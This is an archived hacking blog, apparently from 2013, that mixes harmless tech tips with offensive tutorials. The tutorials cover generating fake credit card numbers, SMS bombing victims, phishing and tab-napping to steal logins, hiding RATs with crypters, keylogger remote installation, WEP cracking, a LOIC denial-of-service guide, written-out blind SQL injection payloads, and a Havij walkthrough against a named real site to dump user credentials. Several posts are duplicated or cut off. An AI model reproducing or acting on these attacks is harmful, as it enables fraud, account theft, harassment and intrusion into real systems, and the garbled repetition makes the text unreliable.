Here we don’t limit the meaning of word ‘HACKER’ (which is just related to cybercrimes), in broader way it means ‘understanding technology and reapplying-constructing it for one’s need, i.e. observe-learn-apply-teach!’ penultimate means one which is before being ultimate!
Thursday, January 31, 2013
Tuesday, January 29, 2013
Transfer data over 100GB from one place to another via email
Transfer data over 100GB from one place to another via email, pendrive, other storage device. If you want to transfer a file from one place to another, but don’t have enough space, in your pen drive or any other external device or you want to send large data via email, it is better to split the file into pieces and transfer the small files one by one and merge them later. HJSplit is the best
freeware tool available to Windows users for this purpose. It supports file sizes of over 100 GB. In addition to that, this software doesn’t require any
installation to use. Just download the zip file, extract the HJSplit.exe
on your computer and doubleclick to run it. Here’s how you can split and then rejoin those pieces and
end up with a fully functional file.
Spliting a file
1. Double click on the HJSplit.exe file to run it. Now click on the Split
button.
2. click on the Input File button to choose the file you want to split.
3. Click on the Output button to choose the location for the output
files.
4. Then click on Start button to start the process.
NOTE:: The process of splitting the file will start. A progress bar will appear to show the status. The time
it takes will depend on the size of the file you are splitting.
Merge files
1. Run the tool again
2. This time click on the Join button. The File Join dialog box will appear.
3. Click on the Input File button to choose the split file
NOTE:: Note that only the first file will be visible in the dialog box, just select that file, it will automatically
detect the rest.But remember that
all the files you are joining must be
in the same folder.
4. Click the Output button to select
the location of the merged file and click the Start button to start the joining process.
Algorithm to make FAKE CREDIT CARDS !
How to generate valid credit card numbers by yourself
(Credit Cards Algorithm)
-----------------------Disclai mer-----------------------
This post is for educational purposes ONLY to
show how insecure is our world!
I take no responsibility for your actions!
I'm NOT responsible for any damages you make!
The information in this file may be incorrect.
You can copy this file but you are not allowed
to change anything in this file without the
author's permission.
This is a personal file which you are
not supposed to read, so just go away.
TURN WORD WRAP ON IF YOU USE TEXT EDITOR ;)
------------------------------ -------------------
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-
If you desperately need a valid credit card number because you don't have
your credit card generator - generate a valid credit card number by
yourself!
The way of doing it, is simple - you just need to remember it. First of all
let me fast explain you about the credit card number. Credit cards use the
Luhn Check Digit Algorithm. The first number depends on the credit card
type, such as : Visa, Master Card, Discover etc. The folowing few numbers
depend on which bank the credit card belong to. The other numbers can be
any numbers. The last number will be the most important number. Here are a
few examples that will be useful later:
1. Visa [Citibank] - 4013 **** **** **** {Lenght: 16 numbers}
(Visa Cards begin with number 4. Number 013 - represents Citibank)
Use Nokia symbian Mobile As Web Server !!!!
Use Nokia symbian Mobile As Web Server !!!!
Mobile phones has come a long way, from those bulky analog car phones, to state of the art sleek multimedia enabled phones that doubles as a web browser, video cam, digital cam, and who knows what else will come. Mobile phones has become fast and powerful in terms of processing, that it is already comparable to web servers in the late 80's, but with high capacity storage of up to 4GB in multimedia phones.
Nokia has open some of its codes at Open Source Nokia to let developers produce software that will run in Symbian OS. This step has triggered lots of new concepts that may be later integrated in future models of Nokia Phones. Such concept is the Mobile Web Server.
Although the concept of a mobile phone web server has no intended use yet, this step by step guide demonstrates the capability of Apache Httpd, and 3G/GPRS technology to run a mobile web server.
What Do We Need?
1. At least a Nokia 6680 (or any higher model with Symbian 60 v3 or v5 OS) phone, I used a Nokia 6680 phone
2. A network/mobile provider with GPRS or better yet, a 3G network
3.Phyton for Symbian 60 OS that can be downloaded here
Sunday, January 27, 2013
SMS bombing !
BOMB MOBILE PHONE WITH SMS : BEAVER’S SMS BOMBER PRO
This program will bomb the victim’s mobile phone with tons of
SMS. It supports all major networks around the world. But if your
network is not in the list, then don’t worry, you can also add the
carrier network with the help of “custom” option. You can also load list
of multiple victims and bomb them simultaneously. The improvement that
Beaver has made in this version over his previous SMS Bomber is that you
can spoof the email address from which you are bombing the victim’s
mobile phone. For Example, If there was an error sending the message, it
will ask you if you wanna change the E-mail/Password you are using. All
credits to Beaver for this nice program.
Download here
Wednesday, January 23, 2013
Hackers CUP similar competatitions help
Hackers CUP similar competatitions help
Following are some websites which are essential for studying or practising for facebook hackers cup !!
Thes websites contains basic programming and tricks for study with hacking challenges
Cool Tools Every Hacker (kiddie ) should have !
TOOLS FOR KIDDIES !
These are all What you will need if you want to do something at a begginer/intermidiate stage !
These ara internet hacking and cracking softwares tools ! enjoy !
Sunday, January 20, 2013
Phishing attack !
INTRODUCTION TO PHISHING
According to Wikipedia ->
Phishing is the act of attempting to acquire information such as
usernames, passwords, and credit card details (and sometimes,
indirectly, money) by masquerading as a trustworthy entity in an
electronic communication. Communications purporting to be from popular
social web sites, auction sites, online payment processors or IT
administrators are commonly used to lure the unsuspecting public.
Phishing emails may contain links to websites that are infected with
malware.
Phishing is typically carried out by
e-mail spoofing, instant messaging and it often directs users to enter
details at a fake website whose look and feel are almost identical to
the legitimate one. Phishing is an example of social engineering
techniques used to deceive users and exploits the poor usability of
current web security technologies. Attempts to deal with the growing
number of reported phishing incidents include legislation, user
training, public awareness, and technical security measures.
A phishing technique was described in
detail in 1987, and (according to its creator) the first recorded use of
the term “phishing” was made in 1995. The term is a variant of fishing,
probably influenced by phreaking, and alludes to “baits” used in hopes
that the potential victim will “bite” by clicking a malicious link or
opening a malicious attachment, in which case their financial
information and passwords may then be stolen.
So from above all information you are
get to know what is phishing exactly is. So lets now start with its
demonstration on one of your favorite website.
———————————————————————————————————————————————————–
DEMONSTRATION
So now, lets start demonstration of phishing with one of your
favorite social networking website or emailing website. There are many
more, and this method will be apply to each and everyone like gmail.com,
yahoo.com,live.com, hotmail.com, facebook.com, twitter.com, flicr,
mail.com, rediffmail.com, in.com and rest of the websites which provide
these services.
So I am gonna demonstrate you on facebook.
Step-1 :-
Register to any free web hosting website. Some website give cpanel
hosting, which is better for phishing, but however there are huge
websites which provide free hosting, Some of them are -
Tab napping !
Tab Napping !
Phishing is technique through which we can hack account of any website. It is just a copy of the website and you send it to your victim and when he/she login his/her password will be stored in your password website file. For Example you want to hack someone's facebook account then you first of all you need a Facebook phishing page (this is just like facebook login page) and upload it to your website and send it to victim when he/she login with his/her account then his/her password and email address will be sent to your email or save to your website password file.
Tab Napping: Tab Napping is new hacking trick through which you can't directly hack account and you will be using phishing method with tab napping then you can hack account. Actually Tab Napping is a script which you put into a site/blog and when the user visit your website/blog and read your article or play game or watch video, when user go to other tab in browser which contain other website like YouTube, Google etc and came back to your website then your website will be redirected to the phishing page and telling them to login with Facebook/Gmail/yahoo account to continue.When user enter login information he/she will be back to your page and user password will be send to you.
So Whats the Difference ?
Theres' a question in Your Mind Right Now what is the main difference between a PHISHING ATTACK and TAB-NAPPING. In Phishing you had to send the Direct Fake FACEBOOK Login page but in Tab Napping you do not need to send the fake login page. You give your victim the link to the Page Which contains a game/flash/video/anything interesting. If the User leaves that certain TAB unused for a while the page automatically redirects to the FAKE LOGIN PAGE.
So Lets Start With the Tutorial:
Things You NEED
Hiding RAT's !
Hiding RAT's !
In this section we will learn how an attacker manages to hide a RAT in
victim's computer, if you are new visitor or you haven't read the first
part I urge you to please go through previous post on The RAT before you
read this.
Before we proceed I want to tell you there's no RAT tool available whose server can not get detected by an Anti-Virus program. At practical level every Anti-Virus program can detect RAT developed by all possible free as well as commercially available RAT developing tools. Then how an attacker manages to implement an attack on you. Following may be the reasons, why you may become victim to his/his attack,
Before we proceed I want to tell you there's no RAT tool available whose server can not get detected by an Anti-Virus program. At practical level every Anti-Virus program can detect RAT developed by all possible free as well as commercially available RAT developing tools. Then how an attacker manages to implement an attack on you. Following may be the reasons, why you may become victim to his/his attack,
Thursday, January 17, 2013
DeLme's virus generator !
DeLme's virus generator !
Its a virus generator with many of commands which can be executed as given in generator !
Click here to download !
Using keylogger (keylogging) !
Step 1: Download Ardamax Keylogger
from here !
and also patch is included !
i.first download given rar file and then extract it wherever you want .
ii.then just open LJW.exe in HXI folder.
iii.if you see its working fine without patch then no need to use patch,however though you use the patch it wont affect you .
iv.just locate your file directory in the patch software if you want to use patch.
v.lets move ahead---->open keylogger !

Step 3: Now, again right click on Ardamax taskbar icon and select “Remote Installation” to see Remote Installation Windows, click Next on it.
from here !
and also patch is included !
i.first download given rar file and then extract it wherever you want .
ii.then just open LJW.exe in HXI folder.
iii.if you see its working fine without patch then no need to use patch,however though you use the patch it wont affect you .
iv.just locate your file directory in the patch software if you want to use patch.
v.lets move ahead---->open keylogger !

Step 3: Now, again right click on Ardamax taskbar icon and select “Remote Installation” to see Remote Installation Windows, click Next on it.
Use of crypter !
Using crypter to hide attacking softwares from victim !
The crypters are softwares used to hide softwares which are used to attack the victim !
I'm providing here a chrome crypter its a FUD(fully udetectable )
okay let's start with download !
Step 1: Click here ! to download chrome crypter !
How to use it !
In this post i show you how to use chrome crypter so let's start.
first of all you need Chrome crypter if you don't have so don't worry Click here to download Chrome cryoter. When your downloading is complete. Then star Chrome crypter and do like below images.....
first of all you need Chrome crypter if you don't have so don't worry Click here to download Chrome cryoter. When your downloading is complete. Then star Chrome crypter and do like below images.....
I will personally suggest you not to use icon changer as it makes it detectable !
and also it makes it some bugging !
Monday, January 14, 2013
Awesome mouse !
A mouse is undeniably one of the essential tools because as you are reading this, you are clicking and scrolling up and down. If you use a computer (duh!), chances are you depend a lot on a mouse; this is 100% true 20 years ago, maybe 80% true 5 years ago and certainly less than 50% true these day. Reason is devices like trackpads and touch-sensitive tools are taking over the role. However, designers will probably still stick with mouse because they are the more efficient companionwhen it comes their work such as Photoshop, Illustrator, etc.
5 years from now, if you revisited this post, you may find your right hand on a bottle of coke and this post is merely reminding you of a peripheral device you used to use – a mouse. Today’s post celebrate a showcase of unusual, creative and funny mice ever created while it is still at the safe line before extinction! Full list after jump.
Gold Brain Computer Mouse
This blinged brainy mouse is apt for the geeky folks who don’t mind playing with some jazzy stuff too. Maybe brain mouse will activate ideas in your brain.
This blinged brainy mouse is apt for the geeky folks who don’t mind playing with some jazzy stuff too. Maybe brain mouse will activate ideas in your brain.
Aircraft Computer Mouse with LED Lights
The aircraft mouse is avaliable for all folks how loves futuristic thought or for Star Wars fans. Mouse is available in black or white and features two buttons, a scroll wheel and LED lights in red and blue.
The aircraft mouse is avaliable for all folks how loves futuristic thought or for Star Wars fans. Mouse is available in black or white and features two buttons, a scroll wheel and LED lights in red and blue.
Wireless Mouse – Camaro Black
Road Mice appeals to computer users who love cars. Car enthusiasts love these replica automobiles that work as fully-functional computer mice. Road Mice have smooth lines, realistic details, glossy finish and working LED headlights.
Road Mice appeals to computer users who love cars. Car enthusiasts love these replica automobiles that work as fully-functional computer mice. Road Mice have smooth lines, realistic details, glossy finish and working LED headlights.
Lock or Hide any folder or file without any software !
You can lock any folder without using any software.
Follow these steps.
1.Suppose you have a folder named abcd in D:\abcd.
2.In the same drive next to the folder create a new notepad
file with the exact statement
ren abcd abcd.{21EC2020-3AEA-1069-A2DD- 08002B30309D}
3.Now save this text file as loc.bat
4.Create another notepad file and type
ren abcd.{21EC2020-3AEA-1069-A2DD- 08002B30309D} abcd
Follow these steps.
1.Suppose you have a folder named abcd in D:\abcd.
2.In the same drive next to the folder create a new notepad
file with the exact statement
ren abcd abcd.{21EC2020-3AEA-1069-A2DD-
3.Now save this text file as loc.bat
4.Create another notepad file and type
ren abcd.{21EC2020-3AEA-1069-A2DD-
CRACK password of secured PDF files !
8 Free PDF Password Remover Tools
Free PDF Password Remover, Cracker, Reset, and Recovery Tools for Windows
Hello ! friends ,
these are some of the password cracking as well as recovery tools for gaining access to PDF files !
PDFCrack is the best free PDF password recovery tool available, assuming that's what you're after - an actual password "recovery" and not a simple PDF password removal or reset.
Method: PDFCrack would be considered a true PDF password recovery program since it recovers both the user password and owner password from encrypted PDFs. PDFCrack uses a brute-force password recovery method.
Limits: PDFCrack works with PDF files up to version 1.6 with 128-bit RC4 encryption.
My Test: PDFCrack recovered the 4-digit owner password on a version 1.6 PDF file with 128-bit RC4 encryption in two minutes. A longer and/or more complicated PDF password could take days, weeks, or even longer to recover.
If all you need is a way to bypass the permissions security in a PDF then PDFCrack is probably more than you need in a PDF password cracker. However, if you need to know the actual owner or user password, PDFCrack is your best bet.
PDFCrack is a command-line tool and should work on Windows 7, Windows Vista, and Windows XP, including both 32-bit and 64-bit versions.
2. GuaPDF Demo
GuaPDF, sometimes referred to as Guaranteed PDF Decrypter, is a combination PDF password remover/recovery tool. GuaPDF is easy to use and doesn't even require installation.
Method: GuaPDF is primarily a PDF password remover tool for the owner password but can also be used as a PDF password recovery tool for 40-bit encrypted user passwords.
Limits: GuaPDF works with PDF files up to version 1.7 level 3 even with 256-bit AES encryption. However, GuaPDF will only decrypt PDF files at higher levels of version 1.7 if the encryption is at 128-bit AES.
My Test: GuaPDF removed the security on a version 1.7 level 8 PDF file with 128-bit AES encryption instantly.
I recommend that you pick GuaPDF as your PDF password cracker if you have a small PDF with only owner restrictions, which is probably the most common situation. If you need to recover the owner password, try PDFCrack instead.
GuaPDF works on 32-bit and 64-bit versions of Windows 7, Vista, XP, 2000, and most Windows server operating systems as well.
Rooting cameras !! like android phone !
Hacking Cameras - Not many Know this..
A camera, whether it's a point and shoot or a the DSLR, is able to take pictures thanks to the combination of the hardware and the software bundled into the system.
DSLR was this point and shoot :
To be precise cameras are broadly divided into two categories first one is point-and-shoot cameras and second one is the DSLR cameras . The consumer grade point-and-shoot cameras are designed for beginners while the DSLR are cameras are for professionals.What is meant by hacking a camera?
A camera is a tiny computer. The firmware of your camera is the camera how to run different functions on your camera. When we talk about hacking a camera we need the firmware enhancement and not the hardware enhancement. This is somewhat similar rooting an android phone or jail breaking an IOS device. Installing a custom firmware in your camera will improve its functionality; give the features which the stock firmware that came with your camera would not provide.How to Hack a camera
Step one: Installing CHDK
CHDK is a nondestructive and a temporary firmware upgrade, so you can always remove it it leaves your stock firmware untouched. It simply installs in your memory card and so when you format a memory card to camera is back to normal. Furthermore it does not void your camera's warranty.So first log on to : http://chdk.wikia.com/wiki/FAQ#Q._What_camera_models_are_supported_by_the_CHDK_program.3F
to get a list of supported camera models and firmware versions that are currently supported by CHDK.
crack wifi WPE security WITHOUT BACKTRACK !
How to crack WEP keys without backtrack
Hi guys im going to show you how to hack WEP keys without backtracker. Mainly because I couldn't get backtrack to work on my computer and i searched around and found a alternative way that does not need to boot or duel boot.
Ok so the programs your going to need is Comview for wifi and Aircrack-ng.(aircrack is in file at end of tut. Google comview for wifi and download it.)
AND REMEMBER YOU MUST HAVE A COMPATIBLE WIFI CARD.
Step 1. Open comview for wifi. Make sure you see the Blue play button is highlighted like so. Before you click it go to the Logging tab. check mark the box auto saving. then in the first box type 50000 and in the second one type 100.
Step 2. Click the blue play button and a window will pop click start scan.
It will search for nearby wifi signals. Click the one you want to crack and click Capture. Click on the Packets tab and let it do its work. you need around 400,000 packets depending on how secure the network is. you might need more.
Saturday, January 12, 2013
Blind SQL !
What is Blind SQLi
Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established
Blind SQLi Tutorial
Let’s Start…………
Suppose That You want to Hack This website with Blind SQLi
http://site.com/index.php?id=5
when we execute this, we see some page and articles on that page, pictures
etc…
then when we want to test it for blind sql injection attack
http://www.site.com/index.php?id=5 and 1=1 <—- this is always true
and the page loads normally, that’s ok.
now the real test
http://www.site.com/index.php?id=5 and 1=2 <—- this is false
so if some text, picture or some content is missing on returned page then
that site is vulrnable to blind sql injection.
1) Get the MySQL version
to get the version in blind attack we use substring
i.e
http://www.site.com/index.php?id=5 and substring(@@version,1,1)=4
this should return TRUE if the version of MySQL is 4.
replace 4 with 5, and if query return TRUE then the version is 5.
i.e
http://www.site.com/index.php?id=5 and substring(@@version,1,1)=5
2) Test if subselect works
when select don’t work then we use subselect
i.e
http://www.site.com/index.php?id=5 and (select 1)=1
if page loads normally then subselects work. then we gonna see if we have access to mysql.user
i.e
http://www.site.com/index.php?id=5 and (select 1 from mysql.user limit 0,1)=1
if page loads normally we have access to mysql.user and then later we can
pull some password usign load_file() function and OUTFILE.
3). Check table and column names
This is part when guessing is the best friend
i.e.
http://www.site.com/index.php?id=5 and (select 1 from users limit 0,1)=1
(with limit 0,1 our query here returns 1 row of data, cause subselect
returns only 1 row, this is very important.)
then if the page loads normally without content missing, the table users
exits.
Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established
Blind SQLi Tutorial
Let’s Start…………
Suppose That You want to Hack This website with Blind SQLi
http://site.com/index.php?id=5
when we execute this, we see some page and articles on that page, pictures
etc…
then when we want to test it for blind sql injection attack
http://www.site.com/index.php?id=5 and 1=1 <—- this is always true
and the page loads normally, that’s ok.
now the real test
http://www.site.com/index.php?id=5 and 1=2 <—- this is false
so if some text, picture or some content is missing on returned page then
that site is vulrnable to blind sql injection.
1) Get the MySQL version
to get the version in blind attack we use substring
i.e
http://www.site.com/index.php?id=5 and substring(@@version,1,1)=4
this should return TRUE if the version of MySQL is 4.
replace 4 with 5, and if query return TRUE then the version is 5.
i.e
http://www.site.com/index.php?id=5 and substring(@@version,1,1)=5
2) Test if subselect works
when select don’t work then we use subselect
i.e
http://www.site.com/index.php?id=5 and (select 1)=1
if page loads normally then subselects work. then we gonna see if we have access to mysql.user
i.e
http://www.site.com/index.php?id=5 and (select 1 from mysql.user limit 0,1)=1
if page loads normally we have access to mysql.user and then later we can
pull some password usign load_file() function and OUTFILE.
3). Check table and column names
This is part when guessing is the best friend
http://www.site.com/index.php?id=5 and (select 1 from users limit 0,1)=1
(with limit 0,1 our query here returns 1 row of data, cause subselect
returns only 1 row, this is very important.)
then if the page loads normally without content missing, the table users
exits.
Top 10 software crackers !
1. Cain and Abel : The top password recovery tool for Windows
UNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain & Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols
2. John the Ripper : A powerful, flexible, and fast multi-platform password hash cracker
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes
3. THC Hydra : A Fast network authentication cracker which support many different services
When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more
4. Aircrack : The fastest available WEP/WPA cracking tool
Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files)
5. L0phtcrack : Windows password auditing and recovery application
L0phtCrack, also known as LC5, attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows NT/2000 workstations, networked servers, primary domain controllers, or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary, brute force, etc). LC5 was discontinued by Symantec in 2006, but you can still find the LC5 installer floating around. The free trial only lasts 15 days, and Symantec won't sell you a key, so you'll either have to cease using it or find a key generator. Since it is no longer maintained, you are probably better off trying Cain and Abel, John the Ripper, or Ophcrack instead.
6. Airsnort : 802.11 WEP Encryption Cracking Tool
AirSnort is a wireless LAN (WLAN) tool that recovers encryption keys. It was developed by the Shmoo Group and operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. You may also be interested in the similar Aircrack.
7. SolarWinds : A plethora of network discovery/monitoring/attack tools
SolarWinds has created and sells dozens of special-purpose tools targeted at systems administrators. Security-related tools include many network discovery scanners, an SNMP brute-force cracker, router password decryption, a TCP connection reset program, one of the fastest and easiest router config download/upload applications available and more.
8. Pwdump : A window password recovery tool
Pwdump is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is enabled. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file.
9. RainbowCrack : An Innovative Password Hash Cracker
The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one, which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called "rainbow tables". It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished.
10 Brutus : A network brute-force authentication cracker
This Windows-only cracker bangs against network services of remote systems trying to guess passwords by using a dictionary and permutations thereof. It supports HTTP, POP3, FTP, SMB, TELNET, IMAP, NTP, and more. No source code is available. UNIX users should take a look at THC Hydra.
CLICK HERE like our FACEBOOK FAN PAGE !
UNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain & Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols
2. John the Ripper : A powerful, flexible, and fast multi-platform password hash cracker
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes
3. THC Hydra : A Fast network authentication cracker which support many different services
When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more
4. Aircrack : The fastest available WEP/WPA cracking tool
Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files)
5. L0phtcrack : Windows password auditing and recovery application
L0phtCrack, also known as LC5, attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows NT/2000 workstations, networked servers, primary domain controllers, or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary, brute force, etc). LC5 was discontinued by Symantec in 2006, but you can still find the LC5 installer floating around. The free trial only lasts 15 days, and Symantec won't sell you a key, so you'll either have to cease using it or find a key generator. Since it is no longer maintained, you are probably better off trying Cain and Abel, John the Ripper, or Ophcrack instead.
6. Airsnort : 802.11 WEP Encryption Cracking Tool
AirSnort is a wireless LAN (WLAN) tool that recovers encryption keys. It was developed by the Shmoo Group and operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. You may also be interested in the similar Aircrack.
7. SolarWinds : A plethora of network discovery/monitoring/attack tools
SolarWinds has created and sells dozens of special-purpose tools targeted at systems administrators. Security-related tools include many network discovery scanners, an SNMP brute-force cracker, router password decryption, a TCP connection reset program, one of the fastest and easiest router config download/upload applications available and more.
8. Pwdump : A window password recovery tool
Pwdump is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is enabled. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file.
9. RainbowCrack : An Innovative Password Hash Cracker
The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one, which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called "rainbow tables". It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished.
10 Brutus : A network brute-force authentication cracker
This Windows-only cracker bangs against network services of remote systems trying to guess passwords by using a dictionary and permutations thereof. It supports HTTP, POP3, FTP, SMB, TELNET, IMAP, NTP, and more. No source code is available. UNIX users should take a look at THC Hydra.
CLICK HERE like our FACEBOOK FAN PAGE !
DDOS attack using LOIC
I have previously mentioned Hacking With Havij.
I received many requests to post on software to implement Denial of
Service - DOS Attacks. So, I am writing this article to inform you about
how to hack website using Denial Of Service attack. I have demonstrated
denial of service attack using Low Orbit Ion Cannon software. I have
even provided link for software download... just read on.
Note: The following security article is for educational purpose only. I am not responsible for any action done by you. Please do not try this since this is illegal and can take you behind bars.
Denial of Service DOS Attack:
Denial of Service attack is an attack in which target system clogs up due to numerous and large amount of requests sent to it and is hence unable to serve other users of system. DOS attack helps in increasing packet traffic in network leading to congestion. DOS attacks often leads target system to crash, reboot or atleast deny service to other users.
Low Orbit Ion Cannon:
1. Free Download Low Orbit Ion Cannon software hack website using DOS attack.
2. Unzip the file and run LOIC.exe (tested on Windows XP and Windows Vista) to see:
3. In URL field, type the website address you want to take down or hack and hit on "Lock On".
4. In Attack Options, assign "9001" as Timeout Value.
5. Now, simply hit on "IMMA CHARGIN MAH LAZER" to start DOS attack on website. Keep it running to see website down after sometime.
Note: This is DOS attack and will hardly work from single computer or single instance. You can make this attack effective by implemeting Denial of Service attack from multiple computers and running multiple instances of LOIC on each computer.
So friends, I hope you are well acknowledged with Denial of Service attack and how to hack website using DOS attack. If you have any problem in using Low Orbit Ion Cannon software in implementing DOS attack, please mention it in comments.
Download LOIC from here
Enjoy Denial of Service DOS attack to hack website..
CLICK HERE like our FACEBOOK FAN PAGE !
Note: The following security article is for educational purpose only. I am not responsible for any action done by you. Please do not try this since this is illegal and can take you behind bars.
Denial of Service DOS Attack:
Denial of Service attack is an attack in which target system clogs up due to numerous and large amount of requests sent to it and is hence unable to serve other users of system. DOS attack helps in increasing packet traffic in network leading to congestion. DOS attacks often leads target system to crash, reboot or atleast deny service to other users.
Low Orbit Ion Cannon:
1. Free Download Low Orbit Ion Cannon software hack website using DOS attack.
2. Unzip the file and run LOIC.exe (tested on Windows XP and Windows Vista) to see:
3. In URL field, type the website address you want to take down or hack and hit on "Lock On".
4. In Attack Options, assign "9001" as Timeout Value.
5. Now, simply hit on "IMMA CHARGIN MAH LAZER" to start DOS attack on website. Keep it running to see website down after sometime.
Note: This is DOS attack and will hardly work from single computer or single instance. You can make this attack effective by implemeting Denial of Service attack from multiple computers and running multiple instances of LOIC on each computer.
So friends, I hope you are well acknowledged with Denial of Service attack and how to hack website using DOS attack. If you have any problem in using Low Orbit Ion Cannon software in implementing DOS attack, please mention it in comments.
Download LOIC from here
Enjoy Denial of Service DOS attack to hack website..
CLICK HERE like our FACEBOOK FAN PAGE !
How To hack websites using Havij 1.10(Full tutorial)
First thing to do is !
Download havij 1.10
First Find a sqli infected site .Now here i found a vulernable site
http://www.hypetrading.com/productinfo.php?id=285
Now Let's start
Open havij and copy and paste infected link as shown in figure
Now Let's start
Open havij and copy and paste infected link as shown in figure
![[Image: 1.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNvNxxb0sUvAj_2KDIi6pwU7SQCjhdQiElbuHMTJM5rLTFCNYWKGVZGOk_Wq4zgmw9XXeYJK0BWCteXUw_E3HVRZXBz7yloMaTl7Sin5KsNKvXCMTrvCvSQ6DzrnIreOE7mD5_2j5M4YQ/s400/1.jpg)
Now click in the "Analyze"
![[Image: 2.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVxkAn6PsAycpgwRBUMG0DEthLkIqidhllaVnGSzN2EYmkfg4RdVYsa8-F_4oUdA8lUWNUceATVQEv8C7HKl3NLgg-ATnIgWvz4MVUjuXcpYMW78T4ITswFI80Gwy13GV65vfjkqf1z2o/s400/2.jpg)
Then It shows some messages there....Be alert on it and be show patience for sometime to find it's vulernable and type of injection and if db server is mysql and it will find database name.Then after get it's database is name like xxxx_xxxx
![[Image: 3.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9ZZdjNZ5Q3GD_obQd7YmPnhW29UsaSutYZBOxaKvNAse_SjgcJNnaWe6MxyZFmLgxvNLi37LxVsMfu3gylBl9t7MWVCN42Yr1v9Mtw4AV2CeoVqG8hf1VHP0LIkYlUSwwyN1xnbamDLY/s400/3.jpg)
Then Move to another operation to find tables by clicking "tables" as figure shown.Now click "Get tables" Then wait some time if needed
![[Image: 4.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzCAv66h0H9X_CoYNjkXtnbXkuGmQHiRc62wdB4_I0NzQplQl7THPWsoX8AfaUAoOUy6G-1Fwwj1WwVv6TaN_myP32NbpZq3WTaBD_tBO2RrJs_iV1V5O98q_fCtprO1KH1J7SFJ2mmYA/s400/4.jpg)
After founded the tables ,you can see there will be "users" Put mark on it and click in the " get columns " tab as shown in figure
![[Image: 5.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhscwt1Ys824NIh7iV5rpM6kMywkRHfW6lkVr42uWg0fEKB26QUSqND9x7eGPzg_gbWK2VuFowZp9ceIyVX601imSjJvZReDYa0AumyG8Kilsjb2sJ_ftUT1rGPAQuZ6h7j_KDMjgXJXlE/s400/5.jpg)
In that Just put mark username and password and click "Get data"
